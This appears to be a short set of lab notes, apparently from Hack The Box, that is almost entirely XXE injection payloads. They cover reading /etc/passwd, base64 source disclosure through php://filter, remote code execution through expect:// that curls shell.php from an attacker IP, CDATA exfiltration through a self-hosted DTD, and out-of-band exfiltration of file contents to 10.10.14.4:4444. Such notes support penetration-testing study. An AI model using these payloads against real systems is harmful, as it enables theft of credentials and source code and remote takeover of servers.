XXE

LFI

<?xml version="1.0"?>
<!DOCTYPE email [
  <!ENTITY company SYSTEM "file:///etc/passwd">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>

LFI Encoded

<?xml version="1.0"?>
<!DOCTYPE email [
  <!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>

RCE

<?xml version="1.0"?>
<!DOCTYPE email [
  <!ENTITY company SYSTEM "expect://curl$IFS-O$IFS'OUR_IP/shell.php'">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>

CDATA Exfiltration

enyei@htb[/htb]$ echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
enyei@htb[/htb]$ python3 -m http.server 8000

Serving HTTP on 0.0.0.0 port 8000 (<http://0.0.0.0:8000/>) ...
<?xml version="1.0"?>
<!DOCTYPE email [
  <!ENTITY % begin "<![CDATA[">
  <!ENTITY % file SYSTEM "file:///var/www/html/submitDetails.php">
  <!ENTITY % end "]]>">
  <!ENTITY % xxe SYSTEM "http://OUR_IP:8000/xxe.dtd"> <!-- reference our external DTD -->
  %xxe;
]>
<root>
<name></name>
<tel></tel>
<email>&joined;</email>
<message></message>
</root>

Error Based XXE

  • Host this external dtd on our server

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=index.php">
<!ENTITY % oob "<!ENTITY &#x25; content SYSTEM 'http://10.10.14.4:4444/?content=%file;'>">
%oob;
%content;
<?xml version="1.0"?>
<!DOCTYPE email [<!ENTITY % remote SYSTEM "http://10.10.14.4:4444/xxe.dtd"> %remote;]>
<root>
<name></name>
<tel></tel>
<email>&content;</email>
<message></message>
</root>

Last updated